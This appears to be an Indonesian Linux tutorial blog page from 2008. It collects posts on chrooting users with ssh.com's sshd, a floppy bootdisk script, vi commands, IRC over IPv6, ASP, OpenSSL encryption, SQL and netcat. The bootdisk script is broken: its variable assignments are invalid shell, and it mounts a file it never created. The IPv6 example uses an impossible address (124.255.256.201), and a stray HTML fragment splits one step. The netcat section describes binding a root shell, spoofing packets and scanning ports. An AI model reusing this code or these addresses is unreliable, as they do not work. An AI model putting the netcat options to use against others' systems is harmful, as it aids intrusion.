Selasa, 27 Mei 2008

Membuat Chroot dengan sshd

Tujuan dari chroot terhadap suatu login(account/user) adalah untuk "memenjarakan" user tersebut ke home direktorinya sendiri sehingga user yang bersangkutan tidak bisa "naik" ke direktori yang lebih tinggi diatasnya. Hal ini mungkin bisa meminimalisir usaha pembajakan terhadap suatu account yang lain (misalnya root) ataupun pencurian data user maupun data penting lainnya pada suatu sistem operas i linux.

Karena sshd yang mendukung chroot adalah sshd dari ssh.com, maka langkah yang pertama adalah menginstall sshd tersebut dan menguninstall openssh (sshd yang digunakan berlisensi free for non commercial use), jika anda sudah menggunakan sshd dari ssh.com anda bisa melewati langkah berikut ini :


[root@kurowo asfik]# wget ftp://ftp.ssh.com/pub/ssh/ssh-3.2.3.tar.gz

[root@kurowo asfik]# tar -xzvf ssh-3.2.3.tar.gz

[root@kurowo asfik]# cd ssh-3.2.3

[root@kurowo ssh-3.2.3]# ./configure

[root@kurowo ssh-3.2.3]# make

[root@kurowo ssh-3.2.3]# make install

Perhatian, langkah berikut ini sangatlah penting, silakan berhati-hati dalam mengerjakannya, terutama jika anda bekerja diserver secara remote. Aktifkan terlebih dahulu protokol telnet, hal ini untuk mencegah jika tiba-tiba kita tidak bisa terhubung ke server menggunakan ssh.

Pada distro Redhat anda bisa menyunting

file /etc/xinetd.d/telnetdan ubah pada bagian disable = yes menjadi disable = no.

Kemudian restart xinetd :

[root@kurowo asfik]# service xinetd restart

Setelah ok, silakan masuk ke server melalui protokol telnet, langkah selanjutnya adalah langsung menghentikan sshd yang masih berjalan :

[root@kurowo asfik]# service sshd stop

Pastikan semua user telah logout (atau kita logoutkan secara pasti :D ):

[root@kurowo asfik]# killall -9 sshd

Hapus openssh :

[root@kurowo asfik]# for a in $(rpm -qa | grep openssh); do rpm -e --nodeps $a; done

Semenjak root merupakan account yang keramat, maka kita putuskan untuk menolak ssh dengan login root dengan menyunting file /etc/ssh2/sshd2_config pada bagian

PermitRootLogin menjadi :

PermitRootLogin no

Jalankan sshd yang terbaru dari ssh.com :

[root@kurowo asfik]# /usr/local/sbin/sshd

Untuk memastikan sshd yang baru secara otomatis dijalankan setiap server di reboot :

[root@kurowo asfik]# echo "/usr/local/sbin/sshd" >> /etc/rc.local

Silakan dicoba untuk melakukan ssh ke server tersebut, jika sukses, jangan lupa langsung mematikan kembali daemon telnet dengan menyunting kembali /etc/xinetd.d/telnet dan mengubah bagian disable = no menjadi disable = yes, dan karena kita tidak memerlukan

xinetd :

[root@kurowo asfik]# service xinetd stop

Buat user baru yang akan dichroot (misalnya user niken ) sekalian kita set passwordnya :

[root@kurowo asfik]# useradd niken

[root@kurowo asfik]# passwd niken

Changing password for user niken

New password:

Retype new password:

passwd: all authentication tokens updated successfully

Buat direktori etc,bin,lib didirektori /home/niken :

[root@kurowo asfik]# mkdir /home/niken/{etc,bin,lib}

Buat entry untuk user niken di file /home/niken/etc/passwd dan /home/niken/etc/group :

[root@kurowo asfik]# grep ^niken /etc/passwd > /home/niken/etc/passwd

[root@kurowo asfik]# grep ^niken /etc/group > /home/niken/etc/group

Install bash dengan menyalin file /bin/bash ke /home/niken/bin:

[root@kurowo asfik]# cp /bin/bash /home/niken/bin

Salin file library yang digunakan oleh bash (anda bisa memeriksanya dengan perintah ldd) :

[root@kurowo asfik]# ldd /bin/bash

libtermcap.so.2 => /lib/libtermcap.so.2 (0x4001d000)

libdl.so.2 => /lib/libdl.so.2 (0x40021000)

libc.so.6 => /lib/i686/libc.so.6 (0x40025000)

/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

[root@kurowo asfik]# cp /lib/libtermcap.so.2 /home/niken/lib

[root@kurowo asfik]# cp /lib/libdl.so.2 /home/niken/lib

[root@kurowo asfik]# cp /lib/i686/libc.so.6 /home/niken/lib

[root@kurowo asfik]# cp /lib/ld-linux.so.2 /home/niken/lib

Atau bisa juga dengan menggunakan perintah ini :

[root@kurowo asfik]# for a in $(ldd /bin/bash | awk '{print $3}'); do cp $a

/home/niken/lib/; done

Untuk Redhat 7.x, salin pula file /lib/libnss_files.so.2, /lib/libnsl.so.1dan

/lib/libnss_compat.so.2 :

[root@kurowo asfik]# cp /lib/libnss_files.so.2 /home/niken/lib

[root@kurowo asfik]# cp /lib/libnsl.so.1 /home/niken/lib

[root@kurowo asfik]# cp /lib/libnss_compat.so.2 /home/niken/lib

Jika diperlukan juga, install file-utils (ln,ls,rm,mv,cp,du,mkdir):

[root@kurowo asfik]# cp /bin/{ln,ls,rm,mv,cp,mkdir} /home/niken/bin

[root@kurowo asfik]# cp /usr/bin/du /home/niken/bin

Periksa kembali library yang akan digunakan oleh file -file tersebut dengan menggunakan perintah ldd (misalnya: ldd /bin/ls dan seterusnya), kemudian salin ke direktori lib pada home direktori user yang bersangkutan. Ganti kepemilikan /home/niken ke user niken :

[root@kurowo asfik]# chown -R niken.niken /home/niken

Jika anda menginginkan agar user yang bersangkutan tidak bisa menghapus file/direktori yang digunakan dalam chroot, anda bisa menggunakan perintah chattr :

[root@kurowo asfik]# chattr -R +i /home/niken/{bin,etc,lib}

Langkah terakhir adalah menambahkan entry niken pada file /etc/ssh2/sshd2_config bagian ChRootUsers menjadi sebagai berikut :

ChRootUsers anonymous,ftp,guest,niken

Restart daemon ssh :

[root@kurowo asfik]# killall -HUP sshd

Jika sukses, anda bisa mencoba ssh ke localhost dengan menggunakan login niken :

[root@kurowo asfik]# ssh niken@localhost

niken's password:

Authentication successful.

Last login: Wed Feb 26 2003 12:51:42 +0700 from localhost

No mail.

bash-2.05$ ls -la

total 40

drwx------ 5 niken niken 4096 Feb 26 05:48 .

drwx------ 5 niken niken 4096 Feb 26 05:48 ..

-rw------- 1 niken niken 57 Feb 26 05:52 .bash_history

-rw-r--r-- 1 niken niken 24 Feb 26 05:21 .bash_logout

-rw-r--r-- 1 niken niken 191 Feb 26 05:21 .bash_profile

-rw-r--r-- 1 niken niken 124 Feb 26 05:21 .bashrc

-rw-r--r-- 1 niken niken 3511 Feb 26 05:21 .screenrc

drwxr-xr-x 2 niken niken 4096 Feb 26 05:47 bin

drwxr-xr-x 2 niken niken 4096 Feb 26 05:49 etc

drwxr-xr-x 2 niken niken 4096 Feb 26 05:53 lib


Read More for Membuat Chroot dengan sshd

Bootdisk - Distro Linux

Pada dasarnya, script yang digunakan untuk membuat linux distro adalah sebagai berikut :
---------start code
#!/bin/sh
# Script pembuatan distro linux floppy
# Oleh : Rama A Mamuaya [ admin@admin.org ]
# Homepage http://admin.org/

# HowTo :
# make dir named root in active dir.
# inside root dir, create all dir needed ( etc,dev,bin,usr,…) :

# ./root/bin
# ./root/etc
# ./

$KERNEL = /usr/src/linux/arch/i386/boot/bzImage
$ROOTFS = ./rootfs.gz
$BANNER = 'distrobootdisk.sh by admin ( admin@admin.org )'

echo 'Creating Zero Device......'
dd if=/dev/zero of=rootfs bs=1k count=4096


echo 'Formatting device to ext2......'
mke2fs -Fm0 rootfs

echo 'Mounting device ......'
mkdir /mnt/fux
mount disk.ext2 /mnt/fux -o loop

echo 'Copying FileSystems......'
cp -r ./root/* /mnt/fux

echo 'Unmount filesystems......'
umount /mnt/fux
gzip -9 ./rootfs

echo 'Putting bootsector on Floppy'
syslinux /dev/fd0

echo 'Creating bootdisk......'
mount /dev/fd0 /mnt/floppy
cp $ROOTFS /mnt/floppy
cp $KERNEL /mnt/floppy/fuxlinux

cat >syslinux.cfg << _EOF_
# Bootdisk generated by distrobootdisk.sh
# Bootdisk based on FUX-Linux.
# http://admin.org/
# admin@admin.org
default fux
display fux.msg
prompt 1
label fux
kernel fuxlinux
append initrd=rootfs.gz root=/dev/fd0
_EOF_

cat >fux.msg << __EOF__
Welcome to Distro-Linux Bootdisk Linux system Distro-Linux by Admin ( admin@admin.org )
Visit http://admin.org/
__EOF__

echo 'Unmounting Floppy device......'
umount /mnt/floppy
echo 'Its up to you now......'
echo $BANNER
exit
end code-----------

Read More for Bootdisk - Distro Linux

Perintah vi di Linux

Perintah "vi" adalah perintah di dalam shell linux untuk mengedit teks, kalau di dalam Windows pada shell MS-Dos dengan perintah "edit". Yang keduanya hampir mempunyai kesamaan, perbedaannya di dalam dos bisa langsung dari windows dan dapat mouse dapat dijalankan tetapi di dalam vi mouse tidak bisa digunakan untuk memilih option tersebut seperti file, edit, help dll.
Untuk perintah edit di MS-DOS dan vi di Linux adalah sebagai berikut :
edit namafile.extensi --> untuk MS-DOS
vi namafile.extensi --> untuk Linux
Untuk perintah edit pada MS-DOS antara lain

EDIT [/B] [/H] [/R] [/S] [/] [/?] [file(s)]
/B - Forces monochrome mode.
/H - Displays the maximum number of lines possible for your hardware.
/R - Load file(s) in read-only mode.
/S - Forces the use of short filenames.
/ - Load binary file(s), wrapping lines to characters wide.
/? - Displays this help screen.
[file] - Specifies initial files(s) to load. Wildcards and multiple
filespecs can be given.

Dan berikut ini perintah dalam vi dalam linux antara lain :


Insert Text:
a : Insert Text after the cursor
A : Insert text at the end of the current line
I : Insert text at the beginning of the current line
i : Insert text before cursor
o : Open a line below the current line
O : Open a line above the current line
Ctrl-V : Insert any special character in input mode

Delete Text:
D : Delete up to the end of the current line
dd: Delete the current line
dw: Delete from the cursor to the end of the following word
x : Delete the character on which the cursor rests

Change Text:
C : Change up to the end of the current line
cc: Change the current line
cw: Change the word
J : Join the current line with the next one
rx: Replace the character under the cursor with x (x is any character)
~ : Change the character under the cursor to the opposite case

Move Cursor:
$ : Move to the end of the current line
; : Repeat last f or F command
^ : Move to the beginning of the current line
e : Move to the end of the current word
fx: Move cursor to the first occurrence of character x on the current
line
Fx: move cursor to the last occurrence of character x on the current
line
H : Move cursor to the top of the screen
h : Move one character to the left
j : Move one line down
k : Move one line up
L : Move cursor to the end of the screen
l : move one character to the right
M : Move cursor to the middle of the screen
n|: Move cursor to column n on current line
nG: Place cursor on line n
w : Move to the beginning of the following word

Mark A location:
'x: Move cursor to the beginning of the line that contains mark x
`x: Move cursor to mark x
mx: Mark the current location with letter x

Scroll text:
Ctrl-b : Scroll backward by a full screen
Ctrl-d : Scroll forward by half a screen
Ctrl-f : Scroll forward by a full screen
Ctrl-u : Scroll backward by half a screen

Refresh Screen:
Ctrl-l : Redraw screen

Cut and Paste Text:
"xndd : Delete n lines and move them to buffer x(x is any single lowercase character)
"Xnyy : Yank n (a number) lines and append them to buffer x
"xnyy : Yank n (a number) lines into buffer x (x is any single lowercase character)
"xp : Put the yanked lines from buffer x after the current line
P : Put yanked line above the current line
p : Put yanked line below the current line
yy : Yank (copy) current line into an unnamed buffer

Colon Commands:
:!command : Execute shell command
:e filename : Edit file
:f : Display filename and current line number
:N : Move to line n (n is a number)
:q : quit editor
:r filename : Read file and insert after current line
:w filename : Write buffer to file
:wq : Save changes and exit

Search Text:
/string : search forward for string
?string : serach backward for string
n : find next sring

View file Information:
ctrl-g : show filename,size,and current line number

Miscelaneous:
u : Undo last command
Esc : End input mode and enter visual command mode
U : Undo recent changes to current line

Read More for Perintah vi di Linux

IRC dengan IPV6

1. Register ip public di www.ipng.org.uk atau www.xs26.net
- Anda akan mendapatkan ipv6 dan ip gateway ipv6
Misalnya ipv6 : 2001:618:4:2000::d56 dan
ipv6 gateway : 124.255.256.201

2. Aktifkan ipv6 pada shell anda :
#/sbin/modprobe ipv6
#/sbin/ifconfig sit0 up
#/sbin/ifconfig sit0 inet6 add 2001:618:4:2000::d56
#/sbin/route -A inet6 add ::/0 gw ::124.255.256.201 sit0
#/sbin/ifconfig sit0

Jika keluar seperti di bawah ini ber-arti ipv6 sudah OK

sit0 Link encap:IPv6-in-IPv4
inet6 addr: 2001:618:4:2000::d56/0 Scope:Global
inet6 addr: ::127.0.0.1/96 Scope:Unknown
inet6 addr: ::202.10.10.11/96 Scope:Compat
UP RUNNING NOARP MTU:1480 Metric:1
RX packets:310 errors:0 dropped:0 overruns:0 frame:0
TX packets:362 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:
RX bytes:60058 (58.6 Kb) TX bytes:35607 (34.7 Kb)

3. Test ipv6 anda dengan :

#/usr/sbin/ping6 2001:618:4:2000::d56 << style="font-weight: bold;">4. Install psybnc2.3.1 (support ipv6)
- Isi vhost dengan 2001:618:4:2000::d56

5. Masuk ke psybnc
- /addserver irc.plasa.com:6667
- /addsevver irc.ipv6.homelien.no:6667

Read More for IRC dengan IPV6

ASP

ASP atau Active Server Pages adalah produk server-side scripting yang dikeluarkan oleh Microsoft Corporation. ASP merupakan sebuah script yang berbasis Server Side artinya seluruh proses aplikasi dikerjakan sepenuhnya didalam server. Sehingga seorang programmer web atau developer web membutuhkan sebuah web server untuk menjalankan script Active Server Pages (ASP) Terdapat beberapa perbedaan antara ASP dengan server-side scripting lainnya, diantaranya :
- Lisensi, seperti yang diketahui ASP adalah bersifat proprietary.
- Distribusi, ASP hanya dapat dijalankan di sistem operasi windows dengan IIS yang terinstall didalamnya, Walaupun dapat dijalankan di linux/unix dengan Chilisoft ASP, tidak dapat selancar bila di windows.
- Penggunaan COM object yang kental, salah satu keunggulan ASP adalah kekayaannya dalam integrasi dengan COM Object dalam kinerjanya.
- Dapat berkolaborasi dengan script lainnya, seperti VBScript, JScript, PerlScript, PyhonScript, dan lainnya.
- Dominan memakai ADO dalam konektivitas databasenya.

Dalam perkembangannya, saat ini ASP sudah mengimplementasikan konsep .NET didalamnya. Berikut adalah sejarah singkat dari perkembangan ASP :
- ASP version 1.0 (distributed with IIS 3.0) , Desember 1996,
- ASP version 2.0 (distributed with IIS 4.0) , September 1997,
- ASP version 3.0 (distributed with IIS 5.0) , November 2000,
- ASP.NET version 1.0 (part of the Microsoft .NET platform) , Januari 2002
- ASP.NET version 1.1 , April 2003
- ASP.NET version 2.0 , November 7 2005)

Bagaimana membuat ASP
Dalam membuat komponen ActiveX untuk ASP perlu diperhatikan hal-hal sebagai berikut :
- Privilege atau hak akses. Jika komponen ActiveX perlu menjalankan suatu program, menghapus/membuat file dan kegiatan akses sistem lainnya, perlu konfigurasi privilege yang baik. Karena jika tidak maka akan terjadi penolakan hak akses dari sistem operasi.
- Run-time, pada saat eksekusi komponen ActiveX maka komponen tersebut akan diload oleh IIS Worker Process atau w3wp.exe. Maka bila terjadi kesalahan atau kondisi dimana komponen tidak respon, diperlukan penanganan seperti merestart service IIS guna membuka handle ke file ActiveX DLL tsb.
- Registrasi komponen, registrasi komponen dengan menggunakan tools regsvr32.exe diperlukan agar IIS dapat mengetahui komponen yang akan dijalankannya.
Registrasi dapat dilakukan dengan cara mengetikkan : regsvr32.exe [path/nama DLL] pada kotak Run dan untuk unregister komponen dengan cara : regsvr32.exe /u [path/nama DLL].

Read More for ASP

Openssl Encrypt dan Decrypt

OpenSSL adalah sebuah toolkit kriptografi yang mengimplementasikan protokol-
protokol network Secure Socket Layer (SSL v2/v3) dan Transport Layer Security
(TLS v1) dan standar kriptografi yang dibutuhkan.

Apa yang dibahas pada artikel ini adalah mengenal bagaimana OpenSSL dapat
digunakan melakukan encryption/decryption sederhana.

Base64 encoding
Base64 encoding didesain untuk mempresentasikan 'arbitrary sequences' dari
oktekt dalam sebuah format yang tidak perlu 'humanly readable'. Sebuah
subset berjumlah 65 karakter ([A-Za-z0-9+/=]) dari US-ASCII digunakan,
hal ini memungkinkan setiap 6 bits direpresentasikan untuk setiap 'printable
character'.


Untuk meng-encode kata dengan menggunakan OpenSSL base64 encoding dari
command line dapat dilakukan dengan cara:

$ echo "secret words" | openssl enc -base64
c2VjcmV0IHdvcmRzCg==

dan untuk men-decode-nya:

$ echo "c2VjcmV0IHdvcmRzCg==" | openssl enc -base64 -d
secret words

Lalu, bagaimana jika melibatkan sebuah file yang hendak kita encode?
Sebagai contoh, kita memiliki sebuah dummy file testfile.txt

$ cat testfile.txt
Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Etiam suscipit. Sed faucibus, est ut pulvinar fermentum,
eros sem aliquam tortor, non cursus libero ante vel nibh.
Nulla interdum urna in elit. In tellus ante, adipiscing vel,
lobortis vitae, venenatis nec, orci. Mauris porttitor felis
eu tortor. Mauris molestie ipsum a nulla. Cras velit risus,
congue eget, porttitor id, molestie nec, nunc. Nulla eu
augue. Nullam sapien. Nulla malesuada mollis leo.

Kemudian, kita ingin meng-encode-nya dan menampilkan outputnya pada stdout.

$ openssl enc -base64 -in testfile.txt
TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVlciBhZGlwaXNj
aW5nIGVsaXQuCkV0aWFtIHN1c2NpcGl0LiBTZWQgZmF1Y2lidXMsIGVzdCB1dCBw
dWx2aW5hciBmZXJtZW50dW0sCmVyb3Mgc2VtIGFsaXF1YW0gdG9ydG9yLCBub24g
Y3Vyc3VzIGxpYmVybyBhbnRlIHZlbCBuaWJoLgpOdWxsYSBpbnRlcmR1bSB1cm5h
IGluIGVsaXQuIEluIHRlbGx1cyBhbnRlLCBhZGlwaXNjaW5nIHZlbCwKbG9ib3J0
aXMgdml0YWUsIHZlbmVuYXRpcyBuZWMsIG9yY2kuIE1hdXJpcyBwb3J0dGl0b3Ig
ZmVsaXMKZXUgdG9ydG9yLiBNYXVyaXMgbW9sZXN0aWUgaXBzdW0gYSBudWxsYS4g
Q3JhcyB2ZWxpdCByaXN1cywKY29uZ3VlIGVnZXQsIHBvcnR0aXRvciBpZCwgbW9s
ZXN0aWUgbmVjLCBudW5jLiBOdWxsYSBldQphdWd1ZS4gTnVsbGFtIHNhcGllbi4g
TnVsbGEgbWFsZXN1YWRhIG1vbGxpcyBsZW8uIAo=

Jika kita ingin menyimpannya kedalam sebuah file yang lain, kita dapat
melakukan perintah:

$ openssl enc -base64 -in testfile.txt -out testfile.txt.enc

Mudah, bukan? Selanjutnya, jika kita ingin men-decode kembali file
testfile.txt.enc cukup dengan menambahkan option -d.

$ openssl enc -base64 -d -in testfile.txt.enc -out testfile.txt

File Encryption
Untuk dapat melakukan encryption, kita dapat memilih ciphers yang tersedia
oleh OpenSSL. Kita dapat membaca manual openssl secara lebih detail atau
melihat daftar encryption yang tersedia dengan perintah:

$ openssl -h
...
Cipher commands (see the `enc' command for more details)
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb aes-256-cbc
aes-256-ecb base64 bf bf-cbc bf-cfb
bf-ecb bf-ofb cast cast-cbc cast5-cbc
cast5-cfb cast5-ecb cast5-ofb des des-cbc
des-cfb des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb des-ede3-ofb
des-ofb des3 desx idea idea-cbc
idea-cfb idea-ecb idea-ofb rc2 rc2-40-cbc
rc2-64-cbc rc2-cbc rc2-cfb rc2-ecb rc2-ofb
rc4 rc4-40 rc5 rc5-cbc rc5-cfb
rc5-ecb rc5-ofb

atau

$ openssl list-cipher-commands
aes-128-cbc
aes-128-ecb
aes-192-cbc
aes-192-ecb
aes-256-cbc
aes-256-ecb
base64
...
rc5
rc5-cbc
rc5-cfb
rc5-ecb
rc5-ofb

Setelah memilih cipher yang disukai, kita akan mulai mengenkrip sebuah file.
Proses ekripsi dilakukan dengan perintah:

$ openssl enc -[CIPHER] -salt -in input_file.txt -out output_file.enc

Perlu diperhatikan output dari perintah diatas adalah binary file. Jika
kita ingin mendapatkan format ASCII, kita dapat menambahkan option -a.

$ openssl enc -[CIPHER] -a -salt -in input_file.txt -out output_file.enc

Sebagai contoh, kita akan menggunakan bf-cbc (Blowfish) cipher:

$ cat testfile.txt
Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Etiam suscipit. Sed faucibus, est ut pulvinar fermentum,
eros sem aliquam tortor, non cursus libero ante vel nibh.
Nulla interdum urna in elit. In tellus ante, adipiscing vel,
lobortis vitae, venenatis nec, orci. Mauris porttitor felis
eu tortor. Mauris molestie ipsum a nulla. Cras velit risus,
congue eget, porttitor id, molestie nec, nunc. Nulla eu
augue. Nullam sapien. Nulla malesuada mollis leo.

$ openssl enc -bf-cbc -salt -in testfile.txt -out encryptedfile.enc
enter bf-cbc encryption password: [PASSWORD]
Verifying - enter bf-cbc encryption password: [PASSWORD]

$ file encryptfile.enc
encryptfile.enc: data

NOTE: jangan coba-coba membaca file binary tersebut.. :-)

Untuk mendekrip file encryptfile.enc, kita harus mengingat cipher yang
dipilih dan password yang digunakan.

$ openssl enc -bf-cbc -d -in encryptedfile.enc
enter bf-cbc decryption password: [PASSWORD]
Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Etiam suscipit. Sed faucibus, est ut pulvinar fermentum,
eros sem aliquam tortor, non cursus libero ante vel nibh.
Nulla interdum urna in elit. In tellus ante, adipiscing vel,
lobortis vitae, venenatis nec, orci. Mauris porttitor felis
eu tortor. Mauris molestie ipsum a nulla. Cras velit risus,
congue eget, porttitor id, molestie nec, nunc. Nulla eu
augue. Nullam sapien. Nulla malesuada mollis leo.

atau meletakkan output ke sebuah file baru..

$ openssl enc -bf-cbc -d -in encryptedfile.enc -out decryptedfile.txt
enter bf-cbc decryption password: [PASSWORD]

Jika kita mengharapkan output dari encrypted file adalah ASCII (biasanya
untuk keperluan mengirim e-mail), kita dapat menggunakan option -a yaitu
memanfaatkan base64 encoding.

$ openssl enc -bf-cbc -a -salt -in testfile.txt -out encryptedfile.asc
enter bf-cbc encryption password: [PASSWORD]
Verifying - enter bf-cbc encryption password: [PASSWORD]

$ cat encryptedfile.asc
U2FsdGVkX19UK6hVxrtZusGrKeFEyOfrwHLPcSRROiRKdyBBsdSpR+lNNWRNXY81
+Y+Pk8kp6wkjIqjbOvTHGamKKk9Pww777bjQNTLNK1jNClUtjTyPPl8P1Xxkx7Uq
IJ7K2/7DFeKExuONq8mcU1PHznGNULKHYQIjfFV94njDxxsCc7miA8vLSOe+z9Pa
UUC+97aFIB1mmTR4ChGIMvrW9t0tNm2OSEJIfPkIOytRtI21iQo156F2YUwRwm6u
szNz5VvGAqRKPKPKFkfIuRXAglFuQVILiRyL/O3QtdmeAPYSnLiavmAehDOAlRAf
L0x+XXRcN7+OgvZVChNRxmKbWOn/vuZnzgnCcyMvF3jgj3U8BtBRbMCWzbH0Avqw
0qvRCqDwq+88m0fuoTq4NE2pm+K2yX7A9uWR/z6NrQOdd/i5ICAIfjouXTWdOQ/C
PQsyA7GQVQ7FLz/8ReAi0itNQ5ixIq5NaZQm4QmMeFEYV+oQ1PnaQ/FRjzbWVCQZ
FNDYIAwi2t2mMfoXpHmZ7cSHdE0R+1iKMwb0Qeta4+Gc+Qrg3XUZkFpFY79JIzub
uPKre9L3I4FPJxfRcC1pLPBQBiWKpLB6p/k/Js35EGdXpkyE/fzZi+b2OtihDBhl

Untuk mendekrip file tersebut;

$ openssl enc -bf-cbc -d -a -in encryptedfile.asc
enter bf-cbc decryption password: [PASSWORD]
Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Etiam suscipit. Sed faucibus, est ut pulvinar fermentum,
eros sem aliquam tortor, non cursus libero ante vel nibh.
Nulla interdum urna in elit. In tellus ante, adipiscing vel,
lobortis vitae, venenatis nec, orci. Mauris porttitor felis
eu tortor. Mauris molestie ipsum a nulla. Cras velit risus,
congue eget, porttitor id, molestie nec, nunc. Nulla eu
augue. Nullam sapien. Nulla malesuada mollis leo.

Read More for Openssl Encrypt dan Decrypt

SQL

Pengertian SQL
SQL (yang biasa dibaca sequel) merupakan kependekan dari Structured Query Language yaitu bahasa yang dirancang khusus untuk komunikasi dengan database. Tidak seperti bahasa-bahasa lainnya (seperti bahasa C, basic, pascal atau bahasa pemprograman yang lain) Bahasa SQL sengaja di rancang untuk melakukan hal secara sederhana dan efisien untuk membaca dan menulis data dari suatu database.
Manfaat dari SQl antara lain :
SQL bukanlah bahasa kepemilikan yang digunakan oleh vendor database perorangan. Hampir semua database besar mendukung SQL, sehingga dengan mempelajari bahasa SQL, anda dapat berinteraksi dengan hampir seluruh database besar yang beredar seperti Ms. SQL server, Oracle, Ms. Access, atau MySQL. SQL mudah dipelajari, karena semua statement dibuat berdasarkan kata-kata dalam bahasa inggris yang umum. SQL benar-benar suatu bahasa yang kuat, dan dengan kepandaian menggunakan unsur-unsur bahasa tersebut, anda dapat melakukan pengoperasian database yang kompleks dan sulit.


Sebelum anda masuk ke bahasa SQL, ada baiknya mengenal terlebih dahulu dasar-dasar database, apa sebenarnya SQL dan apa yang bisa dilakukannya.

Pengertian database
Sadar ataupun tidak sadar, sebenarnya anda selalu menggunakan database dalam kehidupan keseharian. Misalkan saja saat seorang guru mengisikan nilai-nilai be buku nilai, guru tersebut sudah menggunakan database, atau saat anda sedang mencari situs tertentu dengan menggunakan search engine seperti GOOGLE atau Yahoo, anda sedang menggunakan database, atau mungkin ketika anda menggunakan kartu ATM pada mesin ATM, saat memasukkan PIN dan melakukan transaksi, database-lah yang anda gunakan.
Walaupun dalam kehidupan sehari-hari secara sadar ataupun tidak menggunakan database, masih saja terbesit dibenak apa itu database ?
Secara sederhana database adalah kumpulan data yang disimpan dengan beberapa cara pengorganisasian. Coba anda bayangkan sebuah sebuah lemari berkas/filing kabinet, itu adalah lokasi fisik yang sederhana menyimpan data, tanpa memperhatikan jenisnya atau
bagaimana diaturnya.

Tabel
Tabel adalah daftar data yang terstruktur dengan tipe khusus. Misalkan dalam lemari berkas, untuk menyimpan informasi tentunya dengan membuat file-file yang diletakkan lemari kabinet dan setelah itu menempatkannya kedalam file khusus, dan file itulah dalam suatu database dikenal dengan tabel.

Kolom dan Tipe data
Biasanya dalam suatu tabel terdiri dari satu atau lebih kolom. Kolom berisi bagian informasi dalam tabel. Misalkan dalam daftar nilai, terdapat kolom nama yang berisi seluruh nama-nama siswa, kolom nilai ulangan harian, berisi seluruh nilai harian siswa, kolom nilai ulangan Umum, berisi seluruh nilai ulangan umum, dan kolom-kolom lainnya.
Setiap kolom memiliki jenis/tipe data tertentu dan saling terkait. pada contoh diatas kolom nilai ulangan harian berisi nilai yang berupa angka, dalam database dikenal dengan numerik. Kolom dalam database lebih dikenal dengan istilah field.

Baris
Kembali pada contoh daftar nilai, misalkan berisi data dengan nama siswa Andi, nilai ulangan hariannya 8, dan nilai ulangan umum 7, nama siswa Beni, nilai ulangan harian 8, dan nilai ulangan umum 7, begitu seterusnya dan data-data itulah diletakkan disetiap baris suatu kolom.
Dalam dunia database, istilah baris dikenal dengan nama record

Kunci
Dalam suatu baris yang terdiri dari beberapa kolom untuk melakukan pengindifikasian suatu baris. Misalkan pada tabel daftar nilai untuk pengindifikasian dengan kolom ID atau berupa no induk dari siswa tersebut.
Kolom tersebut yang mengidentifikasikan secara unik setiap baris di dalam suatu tabel disebut primary key atau kunci primer. Tanpa kunci primer, proses pembaharuan (update) dan penghapusan baris-baris khusus pada tabel akan menjadi sulit.

Dalam kolom primary key, haruslah memenuhi syarat-syarat berikut :
Dua baris tidak bisa memiliki nilai kunci primer yang sama Setiap baris harus memiliki nilai kunci primer artinya kolom tidak boleh ada yang kosong Kolom yang berisikan nilai kunci primer tidak pernah dapat dimodifikasi dan diperbaharui Nilai kunci primer tidak dapat digunakan kembali.
Kunci primer biasanya ditempatkan pada kolom tunggal di dalam tabel. Tetapi ini tidak harus, karena banyak kolom yang digunakan bersama-sama sebagai kunci primer. Jika digunakan banyak kolom maka aturan diatas harus diterapkan pada semua kolom dengan nilai-nilai kolom yang unik.
untuk memahami penjelasan diatas perhatikan contoh dibawah ini :
Misalkan anda memiliki tabel dengan nama daftar_nilai, dengan data-data sebagai berikut :
Mengenal SQL

Read More for SQL

Netcat

Netcat secara sederhana, penggunaannya mirip dengan penggunaan telnet Telnet client, karena pada netcat dapat mengakses remote host mana saja dengan port apa saja (pada protokol TCP dan UDP). Sebagai contoh: untuk connect ke sebuah host bernama google.org pada port 80, Anda cukup mengeksekusi command:

$ nc google.com 80

Lalu tekan CTRL + C untuk exit. Jika port yang dituju terbuka, Anda dapat
memberikan perintah yang Anda inginkan. Seperti:


$ nc google.org 80
GET / HTTP/1.0 [ENTER]
[ENTER]
HTTP/1.1 200 OK
Date: Sat, 30 Apr 2005 03:29:21 GMT
Server: Apache/1.3.33 (Darwin) PHP/4.3.10
Connection: close
Content-Type: text/html
...

Netcat juga dapat digunakan sebagai tool untuk melakukan testing sebuah firewall. Yang menjadi tujuan testing adalah mencari tahu ports yang berstatus OPEN dan LISTENING.

Perintah-perintah di dalam netcat antara lain :
-g gateway Tentukan source routing hop untuk koneksi-koneksi outbound.
-G number Digunakan untuk memberikan spesifikasi source routing pointer dalam IP header.. value: 4, 8, 12, ...
-i seconds Menentukan delay interval pengiriman packets. Sebagai contoh, jika Anda ingin netcat menunggu 5 detik untuk scanning ports, gunakan -i 5
-l Listen mode. Jika digunakan dengan options tambahan, maka sangat dimungkinkan untuk melakukan binding ke sebuah root shell.
-n Tidak menggunakan DNS support dan hanya menggunakan IP address saja. Sangat berguna jika DNS Anda seringkali 'lambat' dan 'bermasalah'.
-o file Membuat format hex-dump traffic ke sebuah file.
-p value Sebuah option untuk melakukan port spoofing. Jika Anda ingin sebuah packet tampak terkirim dari port 53 dari sebuah host, maka Anda akan menggunakan -p 53.
-r Memungkinkan netcat untuk melakukan random scanning ports.
-s address Melakukan spoofing source address dari packet. Option ini tidak dapat bekerja pada semua sistem.
-u Secara default, netcat menggunakan protokol TCP. Dengan menggunakan option ini, netcat akan menggunakan User Datagram Protocol (UDP).
-v Verbose mode. Gunakan -v -v untuk mendapatkan informasi yang lebih banyak.
-w seconds Membuat netcat menunggu (dalam detik) untuk setiap respon port. Option ini biasanya dikombinasikan dengan option -z
-z Juga disebut "zero-I/O mode", option ini memungkinkan netcat tidak menggunakan I/O dari source system. Option ini biasanya digunakan ketika memanfaatkan netcat sebagai scanner.

Contoh Dasar ;
Secara sederhana, untuk melakukan koneksi ke remote host, gunakan

